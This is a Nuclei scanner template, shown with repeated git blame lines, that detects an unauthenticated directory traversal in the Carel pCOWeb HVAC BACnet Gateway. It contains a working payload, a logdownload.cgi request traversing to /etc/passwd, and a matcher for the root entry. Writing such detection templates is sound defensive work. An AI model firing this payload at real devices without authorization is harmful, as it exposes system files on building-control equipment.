nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traver...

id: carel-bacnet-gateway-traversal

info:
  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal
  author: gy741
  severity: medium
  description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
  reference:
    - https://www.zeroscience.mk/codes/carelpco_dir.txt
  tags: carel,lfi,traversal,unauth,bacnet,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
Update and rename carel-bacnet-gateway-directory-traversal.yaml to carel-bacnet-gateway-traversal.yaml 2022-07-18 08:17:02 +00:00			`id: carel-bacnet-gateway-traversal`
Create carel-bacnet-gateway-directory-traversal.yaml The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-07-16 01:59:44 +00:00
			`info:`
			`name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal`
			`author: gy741`
			`severity: medium`
			`description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.`
			`reference:`
			`- https://www.zeroscience.mk/codes/carelpco_dir.txt`
Update and rename carel-bacnet-gateway-directory-traversal.yaml to carel-bacnet-gateway-traversal.yaml 2022-07-18 08:17:02 +00:00			`tags: carel,lfi,traversal,unauth,bacnet,unauth`
Create carel-bacnet-gateway-directory-traversal.yaml The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-07-16 01:59:44 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"`

			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`